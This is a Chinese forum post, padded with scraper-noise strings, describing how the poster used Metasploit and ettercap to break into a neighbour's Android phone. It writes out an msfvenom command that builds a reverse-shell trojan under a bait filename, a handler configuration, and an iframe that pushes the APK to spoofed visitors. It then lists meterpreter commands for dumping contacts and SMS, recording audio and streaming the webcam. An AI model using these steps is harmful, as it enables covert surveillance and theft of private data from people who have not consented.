找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1611|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. |$ [9 Z$ |$ C! E$ c3 M 五、msf+ettercap入侵邻居安卓手机 ( y$ W _7 t$ e& F

4 Y$ o( ?- _5 v) ]7 V" h- a

- U1 D: v/ @5 J0 v 首先启动msf $ N& X+ l! e9 Y4 |- N

5 K5 h& {% m0 Q4 ~: _4 M0 v

9 k# k0 O) d2 {6 Y: j6 [ 先用kali生成一个安卓木马,如下命令: v+ q9 \) l/ Y% v% M

" l" ~; O0 h+ ^' b! R

1 X* f" I9 o U Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk + f* e1 O9 V: c$ C; z. i

' M0 h7 Z6 K1 p/ [( N

( f8 S2 }" V4 V$ z( b, l' k 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 % G2 w" c* d, G& X" Q

* F4 P7 J$ H8 G0 R

+ J! B* y1 U$ o/ Q! G 然后进入msf * F! |3 F' g# Z8 m$ h" y* w. C

1 f3 O m1 B( W5 J x" @$ }7 J5 P

8 q# y, H& {8 P) [+ p1 w8 p. G* ^7 | use exploit/multi/handler + S; I5 ^, X. I6 c; @

3 G7 @5 O$ E# T# J

$ O, o# N4 d0 ~1 Y/ P+ ^ set payload android/meterpreter/reverse_tcp : [" ~( ~% T% [3 M' u6 w

$ G5 i+ e! a f' _# q( Q5 p6 n

. y' z. M2 Z5 C' ^. A0 B set LHOST 192.168.0.109 //ipkailiip % j6 y8 ]9 ]( A; b- m

5 m1 M) \, |& P& K

( `5 u8 {5 L; [* n( o T set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : O* k# N! Y% w+ [0 G6 p2 s

$ Y% ]. ^( r$ N& A

) W- X; i* }) j) w' S# V Exploit ( H0 a: [/ O. U3 M+ N

6 Y2 o1 i s! _

: M0 N$ P" t; M# l6 C! D   , \! m7 a4 b' g* G

* U2 o# C: c% `* [& i( g L

; K2 G$ @9 I0 X# Y% C 下面我们开启ettercap -G 9 f- }6 e9 i4 A" n, f, r

- W3 W+ ^' D6 S$ }0 L9 H

2 j- H, J. P0 v& C* k 我物理IP % l' a$ M- M% x" {) q' M

6 C* D. R9 T* G: V

8 Z; ^4 p0 r9 F5 D6 c   - I& a$ i: m7 y$ C/ i/ r& f B

: v# N" @7 A( l; s5 i

- ?, |$ [5 _8 p }' L; ~) ?* v 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 6 S; v8 f, ^9 Z" `4 e4 o+ h

2 q( l8 _/ u* X! x9 s

( Z/ X$ V4 w1 w( f* L 下面我们来设置一下 ( l7 I' u% C/ r e7 z/ n

8 C4 M! q! r" V* @3 E3 b" \ e, o

2 e4 T z0 [$ A/ M   / ?$ X4 \) ]% y# U; L2 i5 d, y

3 ~- u+ I0 M5 I+ u8 a! u

7 E/ H M/ D5 I! M* o+ e% Y6 q* ~ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 2 o5 V/ `) f. X) x* C0 r: P% D

- P) y- | h6 w, D2 M% G

6 m4 l( Q# G: s; J' X s   % P. [; O$ Z8 C5 A8 }: w* g# P

& \& I0 m% Y. M: y) K* T9 u/ s

. w! N4 a" t+ \7 Y: \& H/ A   " |5 K! ]- L) p j+ S1 d' ]; u5 B

$ t# R: P5 H9 }; d* t* y: K

+ D, W" j/ ^6 k& n   / q( K/ y7 @/ _7 h/ ^+ p; O5 y9 F A

8 }) }3 n- L: o3 G3 n

9 `' `. E0 Y( N+ O" W% [5 v/ E @ i   ' q( C: [! f8 ~. t

& z) k8 g# f2 E

: M ~: G$ V2 R& @' q2 W   - H% a6 H: P/ J% K6 i* A

Q& `+ J( I9 S" P+ }: H0 P8 n+ A

* \/ P8 d0 N: ]- W9 W   / R5 p% P7 Y/ A

6 c# U3 Q9 t/ k! G) H" N4 S

9 m% ?- l: W' D$ Y3 P   $ x4 S1 p! L, Q2 ] ]

7 J2 `! g+ S6 d# Y0 N7 f' @* u

6 z9 h$ n4 D. V) n: J' p   . O' m8 K/ R& m8 {, y& q6 G

3 i% r5 k* c! `1 F; ]

( @8 W; q9 u: D; `+ d8 f   # O8 L ~# T t9 w1 k

1 ]' v% x1 e4 U

: M! N; k8 R; H2 q8 o   , H9 E4 d3 G5 g- M

+ _" O% ~: ]1 X: i

$ A8 v8 k2 p. `* o   5 l+ }# x3 |) F. s

! n/ F: g7 d7 ]; Z

* _0 L& z& Y6 s   & u0 s1 o$ A. G

; Q: _9 |* O' }8 z8 m# b9 a3 H

# b0 |0 @0 l& A7 E% S7 C4 L) d   9 Y/ R5 f8 M( L1 G W

4 c/ T: C! G) @1 D; {+ h$ K1 T

4 ~: h" [5 B+ }, V: [# b; a( R9 X9 d$ q 下面我们开始攻击 7 [2 T+ [3 L4 e2 P! |- }; }5 ^; u

# {7 x3 P' i( I; N, G1 E, ^

! M& H0 W. U% F% o   m0 k( U0 w6 O/ ]$ C# C

# n! R- c/ z1 \- H8 H F

' t- |( k4 U7 n3 W% @+ V' W   * ?! }/ T5 I* E+ m5 a8 {# o; D

5 |9 Z) H5 G/ Q$ k+ B$ v, c" m

: e8 P5 O0 t( b   ) w/ b( { B' m9 U

$ J- S6 F% D$ s V) i3 G; ]: h

# R+ P. h0 Y6 g8 A$ i) c: F   : H F4 i( d+ P3 Q& x9 I8 z4 q

$ r4 v* t, T; T3 s5 u+ J6 k$ f

; K' k$ u6 b1 w, C5 U& w   5 K% C. \6 W. n- [

+ f3 V3 ~; Z/ K N7 y: ?- v/ S

$ q0 V q! R' p) R: H& E 大概过了5分钟多,发现反弹成功了 , W' _9 Y, S% E6 {! P1 }0 Q S) m' X& c$ \

1 K. Z3 U" g8 T' g* }# `3 d S

: L" V1 j: G9 Y5 G6 N( L( @   ' i1 \! [+ ^) o) V* w4 S: j) Z# \

4 i# W0 D1 k& f' @) w8 L+ C: w

~ T: m; _: y2 j0 m( r- J   % J, c7 z* x6 M- O, a' g3 [% M

" D& u6 }# A% |" i* R

( O6 M0 t; v8 Z) x! ?; R! B9 |   1 o! W% l9 k1 y2 x0 i+ H/ |- f3 g

9 S- V; V6 O+ n4 J

3 T+ m) L, @8 r$ b5 b, d' M1 v   * O! @% {1 s; h0 z1 b0 g; z+ ^4 e

* `8 E& R2 M3 \2 s8 f

: O' h% S/ Y9 \/ S2 B: G   7 {6 m1 W- j$ F# ?

6 F/ r2 Z% b' w( s* w& Y3 k

: c! j( g0 i* B& ~1 l) L U   * {, n3 h/ z; w- j1 R

. b! ]1 @* g9 h

! O/ F! @- f# w' l/ ^" R   0 E: |1 C6 p) O$ B

4 X Z4 {6 a M* n

" n6 Y: k6 c5 |1 e. F0 V% ^" q+ m 执行命令 & `4 V- a1 g5 @" y, o5 u5 n

6 l4 Q1 ^, c# L* `$ u! ~

& r: X/ i+ b' B   8 @8 x. B b+ N1 a

' F2 ~+ l6 e2 Z* o" m7 s# x

$ T! a9 t& y7 q0 C, P4 b# J dump_contacts    --》这个是导出电话 5 k, ? Q3 G8 \4 {/ H$ v

( }5 u# j+ F( k6 z! [

0 z; \9 N, O) J0 g: A dump_sms --》这个是导出信息 ! O! }( d) K1 p. r/ D

0 }3 v( }$ F: H2 ?2 q( e

6 F( [" o1 k7 ~' [% j- G record_mic     Record audio from the default microphone for X seconds . }5 ^0 C& l/ D# I0 _

# b% u& J: q5 N3 Q

( k, }0 T+ M% c) G     webcam_chat    Start a video chat * _: r' P4 `) f/ \# ?8 C0 ?7 h

# Y- z8 b) }1 G+ ` ?) T

/ [, c* J2 a1 O/ P     webcam_list    List webcams 1 Y1 N, a$ _- B% H4 V$ {5 h

( ]/ `. N- Q& \: b K' _# W" J

6 D# {) D7 C# v8 d2 ~. v     webcam_snap    Take a snapshot from the specified webcam . u( y( ]) b) f

3 ~1 D l; v8 F8 }

: |: p G) Q; Z# P8 T webcam_stream  lay a video stream from the specified webcam & p" p- u. {; O* L

* B/ X/ C$ y: s9 _5 S+ V G U

5 E9 g5 m3 a0 T @, N   ) q- t. l3 W$ O3 ^9 E' a

6 _; }+ q6 H: J4 A5 S) c

9 Y: h# S/ n6 o* P* V   : W3 ^7 e% Z% [# V/ _. R. \, E

" i- s- s O* F6 v

' B* C: T/ l3 V 我们打开看一下电话薄, ! A4 a% \3 ~3 ^8 p* V- z

# S# c% D1 f5 @- o9 l* _& x+ f; r

, V) `( K( k2 I4 U7 w   D- v. Y) R, Q$ b E

3 Q D0 J+ f- F/ T

+ W0 }2 D- ~2 g/ K! e* p$ ^( ]   7 s$ ]& ]6 H. P% A R+ \4 L- F2 I

$ \1 s6 X+ n2 s' a7 _+ j$ [

, }7 L) r+ B1 i3 ~   / I9 ^8 A n/ T0 G0 k- t1 ?$ Q- F) j

- Z( N, d/ B6 a, V' N

- R4 g/ [8 j7 x& [   6 j- {$ n5 _* p% X, i5 V* r( P1 n

7 d# N" v1 ?* ^5 b6 Q4 |7 Z K

' |" }( o! c, f( m. H5 l/ g/ Q# ~   # u! w2 c/ }& v! T( u

) h6 d: }9 _. V; b+ t" l2 B

, E5 P4 d% u- V( f2 N   , F% |3 ^3 U$ `

: }; \% \- G* U

; L' i+ a( u" i 我们同时欺骗成DroidJack木马,使用方法如图: + k# {* z! v/ ~" j# r- s

+ P: z3 a* ` X k+ d0 q

0 V3 T) W4 I! p# O2 ?& a2 b   4 }! Y5 y6 z. D% p

7 m# G; ^/ ?7 {9 ]5 a& ]# I

' ^' j/ N+ T, t; A, v- l3 j. j   * Z8 y6 B7 x' G- d& C

& ^7 [4 I8 x7 c7 n! I2 t8 |/ u

# {; r( U4 [( T5 K q   & I& v! e/ S" K, X7 O- I- B' s

" l9 Q& f3 r! j$ k; H

$ N* m: ~, A, o/ h( x4 c# ? 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * e9 v( q8 p1 ?" a0 e% l

- `) F2 N6 C- }3 Z! h

4 J/ I e" j4 R3 Q3 w% H3 U; f* D& O   . N% |3 Z# C8 J

: w3 q7 d) x1 ?; @$ C9 \

\/ ?$ r# b7 l   + g* r9 ]; s+ Z, Z

; P& I4 x( v3 [' r- n! R

+ ?# e, P9 F( Z+ A* P   , i5 ?) b4 U8 x: Z$ \. d

9 K- R+ i2 B; |5 B0 S1 q

3 D* [0 {$ k- Y+ @% h % _: o0 b1 \- V/ m6 t- ?

2 B. g, S/ s9 S' x' Z

+ H, W, P3 q) F9 |
! n& K5 F4 W& L3 y( J# _2 o

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表